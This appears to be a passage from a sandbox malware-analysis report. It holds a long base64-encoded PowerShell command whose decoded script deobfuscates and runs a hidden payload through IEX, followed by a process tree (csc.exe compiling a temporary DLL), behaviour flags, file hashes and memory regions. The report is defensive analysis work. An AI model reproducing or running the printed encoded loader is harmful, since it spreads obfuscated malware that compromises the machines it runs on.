5AHQAYQBhACgAUgBhAGsAcwBhACIAUwBrAHYAYgBlAHcAQgBlAGcAbwBuAGkAbABkAGkAZwBzAG4AVQBuAGQAZQBtAHMARAByAGkAawBrAHAAcwB5AG4AZwBlAG8AQgByAGEAbgBkAG8AQgBvAGgAYQB3AGwAQwBsAGEAdABjAC4ATABlAGQAZQBrAGQATQBhAGEAbABlAHIAcwBuAGUAcwBlAHYATwBvAGwAbwBnACIARgBvAHIAdAByACkAQQBwAG8AaQBkAF0AcwBrAHIAaQB2AHAASABqAGUAbQBtAHUATwB2AGUAcgBsAGIAUwBpAGwAdgBlAGwASQBuAGYAaQBnAGkARgByAHMAdABlAGMAWgBlAGsAcwAgACAARAB1AG0AbQBrAHMAUwBjAG8AZwBnAHQAQQBsAGwAZQBnAGEAVAByAG8AbQBtAHQAVQBuAHAAbABvAGkAQwB5AGsAZQBsAGMARABlAHYAaQBsACAAQgBsAGEAbgBrAGUATwByAHkAYwB0AHgAdQBuAGQAZQByAHQAQQBjAHQAaQBuAGUAQwByAGkAbQBzAHIAUwB0AG8AcgBtAG4ARgBhAHIAdgBuACAARQBmAGYAdQBsAGkARABvAG0AZQBzAG4AVAB1AHQAdABlAHQAQQByAHIAYQBjACAAUwBuAG8AbABkAEUAVQBkAGYAbAB5AG4ASwByAG8AbwBwAHUAUgBrAGUAaABlAG0AUABsAGUAdQByAFAATQBhAHIAaQB0AHIASABlAHQAZQByAGkAQwBhAGwAdgBhAG4AQQBmAGsAYQBzAHQARABpAGgAZAByAFAAUgBvAGcAZQByAHIATwB2AGUAcgBzAG8ARABlAHMAZQByAGMAVQBuAGIAbwByAGUAQwBhAGwAYwBhAHMAVQBuAGQAZQByAHMAUAByAGkAdgBhAG8ATgBvAHMAbwBnAHIAQQBuAHQAbwBjAHMAUABlAGUAcAB5ACgAZwBlAG4AZQByAGkAVABlAG4AdABvAG4AZgBlAGwAdABsAHQAVABvAGQAZAB5ACAATQBpAHIAaQBuAEwASwBpAGwAZABuAGUARABlAG0AbwBjAGYARgBvAHIAbQB5AHQASwBkAGIAbwBsACwAUABsAGUAagBuAGkAYQBuAHQAZQBuAG4AUwBqAGEAcwBrAHQASABlAHgAZQByACAAUwBwAGwAYQBjAG8AVQBmAG8AcgB1AHYAVABhAG4AeQBhAGUAUwBrAGkAYgBiAHIAUABpAG4AZABlAGcAUwBvAHUAZwBoACwATwBvAGUAYwBpAGkAUwB1AGYAZgByAG4AUAByAGkAbgB0AHQATQBlAGcAYQBwACAARgBsAGEAZwBlAFQAUwB5AG0AZgBvAGUAVABvAHAAcABlAG8AQwBoAHIAbwBtAHIAVQBkAHIAYQBhAGUAQgBvAGwAaQBnAHQATwB2AGUAcgBqACwAVgBlAGcAZQB0AGkASAB5AHMAdABlAG4AQwBsAGEAaQByAHQAQQBuAHQAaQBmACAARgByAHUAdABlAFYAVQBuAHIAbwBzAGEAVQBkAGQAYQBuAG4ASABhAHAAbABvAGQAVQBkAHAAbwBsAG8ARgBvAHIAcwB0AHAARQBjAG8AbgBvACwASABqAHMAcABuAGkAQgB5AHIAYQBhAG4ASwByAHMAZQBsAHQARwBlAG0AbQB1ACAATAB1AHMAawBlAFQATQBhAHIAaQBtAHIAUwBhAHAAcABoAGEARABlAHMAZQByAHYAZgBsAG4AcwBlAGUAbgBvAGUAcgByACwAQwBhAG0AcABoAGkAQgBlAHIAZQBnAG4AcwBtAHIAZQBvAHQAUwB2AGUAagBzACAAUABhAHQAaABvAEYASwByAGkAbQBpAG8ATABlAGcAaQB0AHIAcwBrAGEAbABhADEATQBlAHQAYQBtADMAVQBuAGMAbwBuADkASgB1AGwAZQB0ACwAQQBmAHMAawBlAGkASABlAHIAIABGAG4AUwB2AHIAaQBuAHQAdQBuAGkAdgBlACAARQB1AGYAbwByAE0AcwB0AHIAYQBpAGEAUwBjAGgAbwBvAG4ARwBlAG8AbABvAGcAQgBpAGoAZQBrACkAQwBvAGEAdABpADsACgBNAGEAcgBrAGUAfQAKAEcAbgB1AGUAcgAiAE4AbwBuAGQAaQBAAAoARwB5AHIAYQBsACQAVQBuAHAAdQBsAFEARABlAGwAcABsAHUASwBvAG4AawB5AGkAVABhAHAAZQB0AHIAVgBlAHIAcwBpAGsATQB5AGMAbwB0AHMAVwBhAHIAbABpAG8AQQBjAHQAaQBuADMAUwB0AG8AcgBtAD0AQgBvAHIAZQBtAFsAVQBkAGsAYQBzAFEAUgBhAG4AZwBlAHUATABvAG8AawBzAGkAUwBhAGEAcgBzAHIATQBlAHQAcgBvAGsAUwBwAGkAcgB0AHMARABpAHMAaAB3AG8AUwB0AGUAZwBuADEAQgBpAGwAdABpAF0ARgBvAHIAcwBvADoAWgBvAG8AYwB1ADoAbQB1AHQAYQBmAFYARQBzAHAAaQBuAGkAVQB0AGEAawBuAHIAZwByAGEAcABoAHQAQQByAHYAZQByAHUATAB1AHIAbQByAGEAQwBvAG0AbQBlAGwASwBhAG4AYQByAEEAUABlAHQAcgBhAGwASwBhAGYAZgBlAGwAVQBzAHkAbgBsAG8AUwBhAG4AZABzAGMAUABpAGIAcgBvACgAQQBkAHMAbwByADAAQQBjAGMAZQBsACwARQBwAGUAbQBiADEARwBnAGUAYgBnADAARABhAHQAYQBrADQARABhAHMAawBlADgAQQBsAGQAZQByADUARABqAGkAYgBvADcARQB1AGMAYQBpADYAUABsAGEAZwBzACwAZgBpAHMAawBlADEARQBuAHQAZQByADIAdwBoAGEAcgB2ADIAUABhAGwAbQBlADgATABpAHYAcwBzADgASwB2AGEAcgB0ACwAQQBzAHkAbABjADYAcwBlAG0AaQBiADQAUwBrAGkAcABwACkACgBFAGMAaABpAG4AJABWAGkAcgBrAGUAVgBKAHUAcABlACAAaQBTAHQAaQBnAG4AegBJAG4AdABlAHIAYwBNAHUAcwBzAGEAYQBLAGkAbABkAGUAYwBLAHUAcABvAG4AaABmAHIAbwBrAG8APQBEAHIAZwByAGUAKABCAHIAYQB2AGkARwBIAHkAcABvAGMAZQBDAGgAYQBtAHAAdABEAGUAbAB0AHIALQBoAGUAZABvAG4ASQBzAGsAcgBrAGsAdABVAG4AcQB1AGkAZQBTAG8AZgBmAGkAbQBQAHUAZABzAGUAUABNAGkAZABjAGgAcgBLAG8AbwByAGQAbwBMAGkAdABvAGcAcABnAHIAbgB0AGgAZQBIAHUAbgBkAHIAcgBqAGkAbgBnAGEAdABVAG4AZABlAHIAeQBIAG8AYwBrAGUAIABGAGEAcwBoAGkALQBUAGEAZwB1AGQAUABBAHQAdABhAGMAYQBBAGMAZQB0AHkAdAByAHIAaABhAHQAaABCAGEAbgBrAHMAIABTAG8AcgB0AGUAIgBDAGkAbgBjAGgASABTAGEAZwBmAHIASwBCAGoAZQBtAHUAQwBwAGkAZQB0AGUAVQBCAGUAZwB1AGkAOgB0AHUAcgBuAHUAXABVAG4AZABlAHIAUwBTAHUAYgBlAHQAbwBQAGwAdQBnAGcAZgBzAHkAbgBnAGUAdABCAGUAZABzAHAAdwBMAGUAZwBpAG8AYQBwAGUAZQBwAGUAcgBQAHUAZwBlAG4AZQBMAG8AZwBvAGcAXABIAG8AdQBzAGUAbwBTAGkAZwB0AHYAdgBJAG0AYQBnAGkAZQBQAG8AcgByAHkAcgBTAGEAcABpAGUAYgBTAHAAaQBuAGQAZQBGAGEAawBpAHIAIgBCAHIAbwBkAGUAKQBNAGkAZwBtAGEALgBUAG8AcgBpAGwAUABBAGMAIABUAHIAYQBQAHIAbwBmAHUAbgBTAHQAdQBkAGUAdABBAG0AYQB5ACAAaQBFAG0AYgBhAHIAbAAKAHMAcABvAHIAdAAkAFMAdgBhAGwAZQBoAE0AYwBjAGwAYQBhAEIAZQByACAAUAB2AFMAaQBiAGkAcgBmAHUAbAB2AHMAcgBpAFMAcABpAHIAaQBzAGMAaABhAGUAdAAgAFMAbwBlAGwAdgA9AEQAZQBhAG4AYQAgAEcAcgB1AGYAZgBbAFYAZQBuAHQAZQBTAEgAYQBhAHIAcwB5AFMAZQBsAHMAawBzAFQAYQB1AHIAaQB0AEsAbQBwAGUAaABlAE8AZABvAG4AdABtAFMAZQBtAGkAbgAuAFcAaAB1AHQAdABDAEkAbgBkAHMAawBvAFYAYQBsAGsAeQBuAEcAdQBsAGQAcAB2AE0AYQBuAGcAbABlAEUAbQBwAGwAYQByAGMAZQBsAGkAbwB0AFYAcwBrAGUAdABdAFUAbgBkAGUAcgA6AE4AZwB0AGUAbAA6AEEAZgB2AGEAbgBGAFQAbwBsAGQAcAByAE0AbwBwAGgAZQBvAEEAZAByAGUAcwBtAGIAYQBrAG4AaQBCAFIAaABlAG0AaQBhAEUAZgBmAGUAbQBzAEEAYwBjAGUAcwBlAEIAcgB1AGcAZQA2AFMAdgBpAG4AZQA0AEQAZQBjAGEAcABTAFMAdABlAHYAZQB0AHQAYQBkAGUAYQByAFAAYQBnAGEAbgBpAEEAaQBnAHUAaQBuAEMAbwBuAGYAZQBnAEkAcgBpAGQAZQAoAFQAZQBtAGEAbgAkAEcAYQBsAHYAYQBWAFMAZQBrAHQAZQBpAFAAcgBpAHYAYQB6AEwAYQB0AGkAbgBjAFIAZQBmAGwAZQBhAFUAbgBpAG4AZwBjAEYAbABhAHUAbgBoAEwAZQBqAGYAZgApAAoATQBhAGEAbAB0AFsAUwBhAG4AZwBzAFMARgBvAHIAaABqAHkASABhAGwAbABvAHMARgBsAGwAZQBkAHQATQBhAGgAbwBnAGUAQwBpAHIAYwB1AG0ATABpAHMAdABpAC4ATgB1AGQAaQBzAFIAUgBpAGcAbQBhAHUAUAByAGUAdABlAG4AQwBoAGUAbQBpAHQARABhAG4AbQBhAGkAcAByAG8AdABlAG0ATwB2AGUAcgBkAGUAQgBvAHIAZAB2AC4AdgBpAGMAZQB2AEkAUABsAGkAcwBzAG4AdABlAGwAZQBrAHQAQwByAGUAdABpAGUAYQBrAHMAaQBhAHIAdAByAG8AbgBzAG8AUwBpAGsAcgBlAHAAUwB0AGkAZwBlAFMAUABqAGEAdAB0AGUAcABlAGQAaQBjAHIAaABpAGQAawBhAHYAUAByAGUAcwBhAGkARQBrAHMAcABlAGMAQQBuAHMAdABhAGUAQQBuAHMAdABhAHMAQwBhAG4AbgBlAC4AVABlAHUAdABvAE0AQwBlAGwAZQBiAGEAUwB5AHQAdABlAHIAUwBvAHIAdABzAHMARwBlAG4AYQBuAGgAbABhAGMAZQBkAGEAUwB0AHUAZABlAGwAVABhAGwAZQBuAF0AVQBwAGYAbwBsADoATgBvAG4AZABpADoAYwB1AHYAaQBlAEMAVQBuAGgAZQBlAG8ARgByAG8AbgBkAHAARABhAG4AawAgAHkATQBhAG4AZABhACgAUABhAHAAYQB2ACQASwBqAG8AcgB0AGgAQQBmAHQAZQByAGEARgBvAHIAZABrAHYARABlAHIAZQBsAGYARwByAGkAbABsAGkARgBvAHIAYgByAHMAUwBrAG8AbABkACwAUABvAHIAcABoACAARABlAGIAZQB0ADAARABvAHIAZwBzACwAVQBuAGQAaQBzACAAQQByAGIAZQBqACAAQwBoAHUAYwBrACQARwBhAGIAbwBuAFEATwB2AGUAcgBtAHUAZAB5AHAAbgBvAGkAQQBuAGEAdABvAHIARQBuAGQAbwBuAGsASQBuAHUAcwB0AHMASQBtAGEAZwBpAG8ARwBlAHIAbQBhADMARABpAHMAbwByACwATQBlAHMAbwB0ACAAUABhAHQAaQBlACQARgBvAHIAaABvAGgASAB2AGkAcgB2AGEAVABlAGsAbgBvAHYAQwBvAG0AcABlAGYAUABvAHMAdAB2AGkAUABhAGEAdABhAHMAUwB0AHIAYQB0AC4AQwBhAHIAaQBzAGMAQQBiAGUAcgBzAG8AQgBlAHQAZQBnAHUATgBpAHQAcgBvAG4AUwBvAHAAaABpAHQARABhAHQAYQBsACkAYgBhAHIAYgBhADsACgBUAGEAbABsAGUAWwBTAHUAbABmAG8AUQBSAGQAaAB1AGQAdQBEAHUAZgBmAGUAaQBQAHUAbgB0AGkAcgBBAHgAbwBpAGQAawBPAHAAdAByAGEAcwBUAG8AYQAgAFUAbwBGAG8AcgBmAG8AMQBUAHUAbABsAGkAXQBUAGUAdABlAHIAOgBTAHAAZQBjAGkAOgBIAGUAdABlAHIARQBwAHMAaQB0AHQAbgBHAHIAdQBlAGwAdQBFAGsAcwBhAG0AbQBSAGkAcABwAGwAUwBNAG8AbABvAGMAeQBMAGkAdAB0AGUAcwBNAHkAZQBsAGEAdABJAG4AZQB4AHAAZQB3AGkAbABkACAAbQBTAHcAaQB6AHoATABEAGUAdQB0AGUAbwBPAHAAdABpAG0AYwBFAGMAaABpAG4AYQBSAGUAcABlAG4AbABCAGUAdgBlAHQAZQByAGUAcwB2AGEAcwBGAGEAbABrAGUAQQB2AGUAbABvAHAAKABJAG4AZABzAGsAJABXAGgAYQBsAGUAUQBLAGEAbQBpAGsAdQBBAHMAcABoAHkAaQBGAG8AcgBoAGEAcgBTAHkAbgBlAG4AawBEAGkAbQBpAG4AcwBOAG8AbgBjAGUAbwBFAHIAZQBtAGkAMwBTAGEAZwBmAHIALABaAG8AbwB0AGgAIABTAHQAcgBpAGsAMABVAG4AZABlAHIAKQBGAGUAcgBtAGUAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABGAHIAaQBnAHIAZQBsAHMALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAA1ACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJABQAGwAYQBkACAAPQAgACQAUABsAGEAZAAgACsAIAAkAEYAcgBpAGcAcgBlAGwAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAEYAcgBpAGcAcgBlAGwAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACsAMQAsACAAMQApACAALQBlAHEAIAAiAGAAbgAiACkAIAB7AA0ACgAJAAkAJABQAGwAYQBkACAAPQAgACQAUABsAGEAZAAgACsAIAAiAGAAbgAiAA0ACgAJAAkAJABpACAAPQAgACQAaQAgACsAIAAxAA0ACgAJAH0AIAAJAA0ACgAJAAkADQAKAAkADQAKAH0ADQAKAA0ACgANAAoASQBFAFgAIAAkAFAAbABhAGQADQAKAA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4584
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES96F5.tmp" "c:\Users\Admin\AppData\Local\Temp\32cqbg5h\CSC14330FB2F81748809BA2D6578EEF2C1.TMP"
          4⤵
            PID:4704

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.dll

      Filesize

      4KB

      MD5

      c54e5662cc55770c7663a43251e5df03

      SHA1

      63488d9b1b5ea097937ccd72175bf02385e72db0

      SHA256

      43d198de82b88c62eacb3e35c2620ee13d76a41f0b8a63fad595af7101a3f761

      SHA512

      e9038e8314b224bc3455e4a6031877ff3b2322c23350f6134aee5794fa1cad132b4e3b61af120e4ffb197850e44a36e09c6d008833e617267873c1d8b652cebd

    • C:\Users\Admin\AppData\Local\Temp\RES96F5.tmp

      Filesize

      1KB

      MD5

      53b0ed43de7405add294ad832617cfcf

      SHA1

      18c8545341e3e550787c701fbd610e2d8dcbe0bc

      SHA256

      64ed4f758b000b69f64fad98cb53ce528d5d0b292fc7c3b0fefeb29ae3713245

      SHA512

      47c734f4aeb6c34702c914562b0d05a869713477a9aedd92d34bb321999a823c307894b73827c61a0fab440ec10ffcdfdab62c4516eedd1260d9e4077e00bac2

    • \??\c:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.0.cs

      Filesize

      1KB

      MD5

      84d823528b1a6dad43df7554db52c642

      SHA1

      24a70c2417ce3444bb97daa3d0553775274c3861

      SHA256

      180245898f3e1f82261a4cc75ef901ef774f783d69dcd36feb39d371814f93cd

      SHA512

      97c83e6ed22468df31d9c88862b616322138db3171aceedde48b5121d099580681a27d728418dc45f1cf05a0f8b0130ef2157ee61d78e2f0e52be082ca5d7bb8

    • \??\c:\Users\Admin\AppData\Local\Temp\32cqbg5h\32cqbg5h.cmdline

      Filesize

      369B

      MD5

      a74f7aeb845fe28ba3a8b794bc68e007

      SHA1

      eecc30fcd56ffb532f198f9bb41517084412a488

      SHA256

      3732c3c450dda1c58a0f8afd64b461272c452e0614959900361591c93e7404aa

      SHA512

      2134f974ba0b62af2b1e69f7c0ecf2cce2ac070e9c688fb70de362bee0780b312ea3e1ec3c50d86f06b69f463b6a1100b2ba1e2f0d574313c48f36a925ebe7ec

    • \??\c:\Users\Admin\AppData\Local\Temp\32cqbg5h\CSC14330FB2F81748809BA2D6578EEF2C1.TMP

      Filesize

      652B

      MD5

      859c23e5372efc196be62eaadc004b10

      SHA1

      507c690794b82d1c2539159311795d8df4be3e31

      SHA256

      778d704069969df0993ce58c6b114966eeb31f9ad1406ecc1e75c46249abc821

      SHA512

      0499983eb731cd8334d493e8420c3766f7c306906a18776b33e28e1a8d60697eecf48fcdcf9a59931c324d53bb2f7986690b167a1f854988c2126e5aab46559a

    • memory/2448-141-0x0000000000000000-mapping.dmp

    • memory/4584-148-0x0000000007390000-0x0000000007426000-memory.dmp

      Filesize

      600KB

    • memory/4584-137-0x0000000005A40000-0x0000000005AA6000-memory.dmp

      Filesize

      408KB

    • memory/4584-140-0x0000000007130000-0x000000000714A000-memory.dmp

      Filesize

      104KB

    • memory/4584-138-0x0000000006020000-0x000000000603E000-memory.dmp

      Filesize

      120KB

    • memory/4584-132-0x0000000000000000-mapping.dmp

    • memory/4584-135-0x0000000005880000-0x00000000058A2000-memory.dmp

      Filesize

      136KB

    • memory/4584-151-0x00000000071C0000-0x00000000072C0000-memory.dmp

      Filesize

      1024KB

    • memory/4584-139-0x0000000007970000-0x0000000007FEA000-memory.dmp

      Filesize

      6.5MB

    • memory/4584-134-0x0000000005210000-0x0000000005838000-memory.dmp

      Filesize

      6.2MB

    • memory/4584-133-0x0000000004B70000-0x0000000004BA6000-memory.dmp

      Filesize

      216KB

    • memory/4584-136-0x0000000005920000-0x0000000005986000-memory.dmp

      Filesize

      408KB

    • memory/4584-149-0x0000000007320000-0x0000000007342000-memory.dmp

      Filesize

      136KB

    • memory/4584-150-0x00000000085A0000-0x0000000008B44000-memory.dmp

      Filesize

      5.6MB

    • memory/4704-144-0x0000000000000000-mapping.dmp